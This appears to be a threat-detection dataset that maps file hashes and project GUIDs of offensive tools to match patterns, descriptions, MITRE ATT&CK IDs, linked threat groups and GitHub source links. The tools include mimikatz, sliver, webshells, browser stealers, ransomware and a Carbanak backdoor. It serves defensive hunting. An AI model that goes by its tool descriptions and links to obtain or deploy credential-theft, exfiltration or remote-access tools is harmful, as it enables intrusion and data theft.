"*e7697645f36de5978c1b640b6b3fc819e55b00ee8d9e9798919c11cc7a6fc88b*",".{0,1000}e7697645f36de5978c1b640b6b3fc819e55b00ee8d9e9798919c11cc7a6fc88b.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - 
TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","#filehash","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","42256" "*e7711f13b26f4b8f260587592d92f5d04e4aec5124896a35f082b69785e51d26*",".{0,1000}e7711f13b26f4b8f260587592d92f5d04e4aec5124896a35f082b69785e51d26.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","42259" "*e771b4d016aa48c035fe6635758dcb84423b591684e1e952075b5eb998c91c1e*",".{0,1000}e771b4d016aa48c035fe6635758dcb84423b591684e1e952075b5eb998c91c1e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42260" "*E776B801-614D-4E3C-A446-5A35B0CF3D08*",".{0,1000}E776B801\-614D\-4E3C\-A446\-5A35B0CF3D08.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#GUIDproject","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","42261" 
"*e786a45fe464db32262fe83cdefe7728a80c9eb74ff27116b95ab944847f3de4*",".{0,1000}e786a45fe464db32262fe83cdefe7728a80c9eb74ff27116b95ab944847f3de4.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","42263" "*e789ae7e1cf64b173de4ab20baed15152b937231db44bab8482f68f08b02a000*",".{0,1000}e789ae7e1cf64b173de4ab20baed15152b937231db44bab8482f68f08b02a000.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42264" "*e7935d85498c24998f18b6c34083d44504c2f35481d8ced208e7167ca74f46c8*",".{0,1000}e7935d85498c24998f18b6c34083d44504c2f35481d8ced208e7167ca74f46c8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42265" "*e793dfecc85224131dd071a5ff7b9ea7c01156879879701951152090bab15ac5*",".{0,1000}e793dfecc85224131dd071a5ff7b9ea7c01156879879701951152090bab15ac5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42266" "*e7968efd71cb275ba11fb0bad1567611afe86181401a4c05d35516c76c5e3ca4*",".{0,1000}e7968efd71cb275ba11fb0bad1567611afe86181401a4c05d35516c76c5e3ca4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42267" "*e79c6e7acdccaefe648166249c67a7c53a9783940f51ea7d4bb2817d684cf12a*",".{0,1000}e79c6e7acdccaefe648166249c67a7c53a9783940f51ea7d4bb2817d684cf12a.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42268" "*e79c8cadd9b100cb8c9efcc4c67bf33049a4423c08c083913f03e53024e7b3d6*",".{0,1000}e79c8cadd9b100cb8c9efcc4c67bf33049a4423c08c083913f03e53024e7b3d6.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42269" "*e79fd8cb2cbebc663abc7cc9d9be28033ab53a4f1398ffcb5ca0331d2a8a6a26*",".{0,1000}e79fd8cb2cbebc663abc7cc9d9be28033ab53a4f1398ffcb5ca0331d2a8a6a26.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","42270" "*e7a9855e85e1d0040e342e54182576f7f12e7f7fbe0debe50cc434f8215f0172*",".{0,1000}e7a9855e85e1d0040e342e54182576f7f12e7f7fbe0debe50cc434f8215f0172.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42271" "*e7b05678d111dcc2cd46fbe74c7febad2d3a51121bbecb11852e69d332489b22*",".{0,1000}e7b05678d111dcc2cd46fbe74c7febad2d3a51121bbecb11852e69d332489b22.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword 
webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","42276" "*e7b3627d04efe0c3b201656b9bda35df126551dfb3eb47b506e1238bcc4b2ffe*",".{0,1000}e7b3627d04efe0c3b201656b9bda35df126551dfb3eb47b506e1238bcc4b2ffe.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","42278" "*e7bd6debd460c7b76bf0f743473f741b095d9410f063063b39537f2d01928e2f*",".{0,1000}e7bd6debd460c7b76bf0f743473f741b095d9410f063063b39537f2d01928e2f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42279" "*E7BFFEE1-07C1-452C-8AF8-6AD30B1844FF*",".{0,1000}E7BFFEE1\-07C1\-452C\-8AF8\-6AD30B1844FF.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#GUIDproject","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","42280" "*e7c25239e8189e366ad1b7699209f52e99833fc52965b428c0ba9e55cef9791f*",".{0,1000}e7c25239e8189e366ad1b7699209f52e99833fc52965b428c0ba9e55cef9791f.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation 
tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","0","#filehash","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","42281" "*e7c8fc74e31020a6c52c225c143a58c1243ec86e00fcd9038b8194418f8e3603*",".{0,1000}e7c8fc74e31020a6c52c225c143a58c1243ec86e00fcd9038b8194418f8e3603.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","#filehash","N/A","10","","N/A","","","","42283" "*e7c9a0a34bad12057b3c39fb42106b7e095d8b64e9b68010ca8cf516a908c262*",".{0,1000}e7c9a0a34bad12057b3c39fb42106b7e095d8b64e9b68010ca8cf516a908c262.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#filehash","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","42284" "*e7cad48e4b68862af0309de0646b0225fa1f7bb183fc8cfc8dfd0e254364c59a*",".{0,1000}e7cad48e4b68862af0309de0646b0225fa1f7bb183fc8cfc8dfd0e254364c59a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42285" "*e7ccd3ab3e214e8dd902bf044b6de4e5cf03f6db68476995d5cd02ba4e91067a*",".{0,1000}e7ccd3ab3e214e8dd902bf044b6de4e5cf03f6db68476995d5cd02ba4e91067a.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows 
Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","42286" "*e7ccfa126c99f4c6836b28455b1dae4b5a85202d8212f340ef3f3d1785e47387*",".{0,1000}e7ccfa126c99f4c6836b28455b1dae4b5a85202d8212f340ef3f3d1785e47387.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42287" "*e7ce68e94b4b3a3f8ba4e660edd00c794af6d158ce6f993d74d9732cfd83f2c7*",".{0,1000}e7ce68e94b4b3a3f8ba4e660edd00c794af6d158ce6f993d74d9732cfd83f2c7.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","42288" "*e7ce97b11adf6ae5bdf2893583c1de12d1459ced27c9a78cc12282ede35b924a*",".{0,1000}e7ce97b11adf6ae5bdf2893583c1de12d1459ced27c9a78cc12282ede35b924a.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","42289" "*e7d89d1f23c2c31e2cd188042436ce6d83dac571a5f30e76cbbcdfaf51e30ad9*",".{0,1000}e7d89d1f23c2c31e2cd188042436ce6d83dac571a5f30e76cbbcdfaf51e30ad9.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","42290" "*e7e397ee350cadf7f2b49b85c440a340a090881e58e3238d266164b095a4a82d*",".{0,1000}e7e397ee350cadf7f2b49b85c440a340a090881e58e3238d266164b095a4a82d.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","#filehash","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","42292" "*e7eeba3b5fef6c4fb2bf4aa664ce87f13d5b15f288d4c1471c5c872d67ae87d8*",".{0,1000}e7eeba3b5fef6c4fb2bf4aa664ce87f13d5b15f288d4c1471c5c872d67ae87d8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42299" "*E7F99164-F00F-4B2A-86A9-8EB5F659F34C*",".{0,1000}E7F99164\-F00F\-4B2A\-86A9\-8EB5F659F34C.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","42303" "*e7fb74eb2170e30bf6650f9e5fc2c60f68f3532cee3e0309de503a19cd7647c6*",".{0,1000}e7fb74eb2170e30bf6650f9e5fc2c60f68f3532cee3e0309de503a19cd7647c6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - 
T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42305" "*e7fc34563fba238982ec178b82d38c2a182f3d5409a291a5a0ada363d5b292b0*",".{0,1000}e7fc34563fba238982ec178b82d38c2a182f3d5409a291a5a0ada363d5b292b0.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","42306" "*e7fe93ae48f18878e1476a2aaaf46af6da778d2f3a33dfe27c8d18cc890e1e7c*",".{0,1000}e7fe93ae48f18878e1476a2aaaf46af6da778d2f3a33dfe27c8d18cc890e1e7c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42307" "*e8037ba03db7ab77f623de243e19284af0dcc8e2d042e3bf7eba810066fae738*",".{0,1000}e8037ba03db7ab77f623de243e19284af0dcc8e2d042e3bf7eba810066fae738.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42309" "*e803b7023dfdcb1d73de9a04be5222269b020ada4fcc97ca19ef877c55a51c28*",".{0,1000}e803b7023dfdcb1d73de9a04be5222269b020ada4fcc97ca19ef877c55a51c28.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","42310" "*e804b4ea28a60c2491bf78265637e7759df5c2abcda02623f3b534a908064801*",".{0,1000}e804b4ea28a60c2491bf78265637e7759df5c2abcda02623f3b534a908064801.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 
- T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42311" "*e80bda100b7b75500bd6f4cc09e566e5467c784876bc01ba934ea8792daf8b11*",".{0,1000}e80bda100b7b75500bd6f4cc09e566e5467c784876bc01ba934ea8792daf8b11.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","42312" "*e81284fcd76acab65fcb296db056f50a4fa61eb120581ff2d494006d97f2f762*",".{0,1000}e81284fcd76acab65fcb296db056f50a4fa61eb120581ff2d494006d97f2f762.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","#filehash","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","42314" "*e8187f2863d067a0f07cec1d4c0b7150c1975334addfc58d3c742e7bd66f4a13*",".{0,1000}e8187f2863d067a0f07cec1d4c0b7150c1975334addfc58d3c742e7bd66f4a13.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42315" "*e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98*",".{0,1000}e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - 
T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","42316" "*e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98*",".{0,1000}e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt 
Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","42317" "*e82a6a97f9239b0e6bd68c9ce795dc7ae29f6e008bfb8ab63f2dfe9e94817bea*",".{0,1000}e82a6a97f9239b0e6bd68c9ce795dc7ae29f6e008bfb8ab63f2dfe9e94817bea.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","42318" "*e82a9d963a5752b034523b96ee1702ba733c83ca2f00bb3aa190254e8967646a*",".{0,1000}e82a9d963a5752b034523b96ee1702ba733c83ca2f00bb3aa190254e8967646a.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","42319" "*E82BCAD1-0D2B-4E95-B382-933CF78A8128*",".{0,1000}E82BCAD1\-0D2B\-4E95\-B382\-933CF78A8128.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","#GUIDproject","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","42322" "*E832E9B8-2158-4FC0-89A1-56C6ECC10F6B*",".{0,1000}E832E9B8\-2158\-4FC0\-89A1\-56C6ECC10F6B.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a 
widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","42324" "*e8336778c23574464fae2551b27074d52a949d7c97fe3fd0d8351f3f340e811b*",".{0,1000}e8336778c23574464fae2551b27074d52a949d7c97fe3fd0d8351f3f340e811b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42325" "*e83713071664d8b6feeb9c942f05dca3ba4951ac55743dbaeb79933f4728967d*",".{0,1000}e83713071664d8b6feeb9c942f05dca3ba4951ac55743dbaeb79933f4728967d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42326" "*e842c810b6ecb9c7634f1cfbf81b6245094528ac5584179eb8e6932eaa34f421*",".{0,1000}e842c810b6ecb9c7634f1cfbf81b6245094528ac5584179eb8e6932eaa34f421.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
